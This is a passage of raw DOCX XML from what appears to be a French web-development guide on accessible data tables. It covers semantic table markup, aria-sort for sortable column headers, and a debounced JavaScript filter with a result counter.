            </w:r>
          </w:p>
        </w:tc>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Liste</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Lecture verticale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Afficher des statuts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Liste avec badges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Hiérarchie visuelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Trier sur plusieurs colonnes</w:t>
            </w:r>
          </w:p>
        </w:tc>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Tableau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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En-têtes interactifs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un tableau sémantique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 Tableau de données avec légende et en-têtes explicites --&gt;</w:t>
        <w:br/>
        <w:t>&lt;table&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;caption&gt;Commandes de la semaine&lt;/caption&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;thead&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col"&gt;Numéro&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col"&gt;Client&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col" class="nombre"&gt;Montant&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col"&gt;Statut&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/thead&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;tbody&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="row"&gt;CMD-1042&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;td&gt;Awa Diallo&lt;/td&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;td class="nombre"&gt;124,50 €&lt;/td&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;td&gt;&lt;span class="badge badge--payee"&gt;Payée&lt;/span&gt;&lt;/td&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/tbody&gt;</w:t>
        <w:br/>
        <w:t>&lt;/table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.154 — Cinq éléments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83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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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309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Erreur fréquente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;caption&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Titre du tableau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>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scope="col"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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En-tête de colonne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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&lt;td&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> en en-tête</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>scope="row"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>En-tête de ligne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Confondu avec une donnée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>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class="nombre"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Alignement à droite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Chiffres non alignés</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;tbody&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Corps du tableau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mélangé aux en-têtes</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UN TABLEAU DE MISE EN PAGE RESTE UN TABLEAU POUR UN LECTEUR D'ÉCRAN</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Utiliser un tableau pour disposer des blocs produit une lecture absurde. Pour la mise en page, utilisez CSS Grid ou Flexbox.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>45.2 Tri accessible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un tri interactif doit être annoncé et commandable au clavier. L'attribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> indique la colonne active et le sens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un en-tête triable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&lt;th scope="col" aria-sort="ascending"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;button type="button" data-tri="montant"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Montant &lt;span aria-hidden="true"&gt;▲&lt;/span&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/button&gt;</w:t>
        <w:br/>
        <w:t>&lt;/th&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un tri réel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const boutons = document.querySelectorAll("[data-tri]");</w:t>
        <w:br/>
        <w:br/>
        <w:t>boutons.forEach((bouton) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  bouton.addEventListener("click", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const cle = bouton.dataset.tri;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const entete = bouton.closest("th");</w:t>
        <w:br/>
        <w:t>const sens = entete.getAttribute("aria-sort") === "ascending" ? "descending" :</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "ascending";</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    document.querySelectorAll("th[aria-sort]").forEach((th) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      if (th !== entete) th.removeAttribute("aria-sort");</w:t>
        <w:br/>
        <w:t xml:space="preserve">    });</w:t>
        <w:br/>
        <w:t xml:space="preserve">    entete.setAttribute("aria-sort", sens);</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    trierLignes(cle, sens);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>function trierLignes(cle, sens) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const corps = document.querySelector("tbody");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const lignes = [...corps.rows];</w:t>
        <w:br/>
        <w:t xml:space="preserve">  lignes.sort((a, b) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const va = a.querySelector(`[data-cle="${cle}"]`).dataset.valeur;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const vb = b.querySelector(`[data-cle="${cle}"]`).dataset.valeur;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const cmp = Number(va) - Number(vb);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return sens === "ascending" ? cmp : -cmp;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:t xml:space="preserve">  lignes.forEach((ligne) =&gt; corps.append(ligne));</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w: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TRIEZ SUR LA VALEUR, PAS SUR LE TEXTE AFFICHÉ</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>« 9,50 € » se classe après « 124,50 € » en ordre alphabétique. Conservez la valeur brute dans un attribut et formatez seulement à l'affichage.</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`ARIA-SORT`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Attribut posé sur l'en-tête de la colonne triée, valant </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ascending</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>descending</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>none</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>other</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>. Il évite de deviner l'état à partir d'une icône.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>45.3 Filtrer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un filtre doit répondre vite, même sur plusieurs centaines d'éléments. Le retard (debounce) évite de recalculer à chaque frappe ; l'affichage du nombre de résultats évite l'incertitude.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un filtre avec délai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const champ = document.querySelector("#recherche");</w:t>
        <w:br/>
        <w:t>const compteur = document.querySelector("#compteur");</w:t>
        <w:br/>
        <w:t>const lignes = [...document.querySelectorAll("tbody tr")];</w:t>
        <w:br/>
        <w:br/>
        <w:t>function filtrer(texte) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const requete = texte.trim().toLowerCase();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  let visibles = 0;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  lignes.forEach((ligne) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const correspond = ligne.textContent.toLowerCase().includes(requete);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ligne.hidden = !correspond;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (correspond) visibles += 1;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  compteur.textContent = visibles === 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ? "1 résultat"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    : `${visibles} résultats`;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  document.querySelector("#vide").hidden = visibles !== 0;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>let minuteur;</w:t>
        <w:br/>
        <w:t>champ.addEventListener("input", (e) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  clearTimeout(minuteur);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  minuteur = setTimeout(() =&gt; filtrer(e.target.value), 150);</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.155 — Quatre réglages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9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Réglage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Valeur usuelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Délai de frappe</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Moins de calculs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>150 à 250 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Nombre de résultats</w:t>
            </w:r>
          </w:p>
        </w:tc>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Repère pour l'utilisateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Toujours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>État vide</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Évite l'impression de panne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
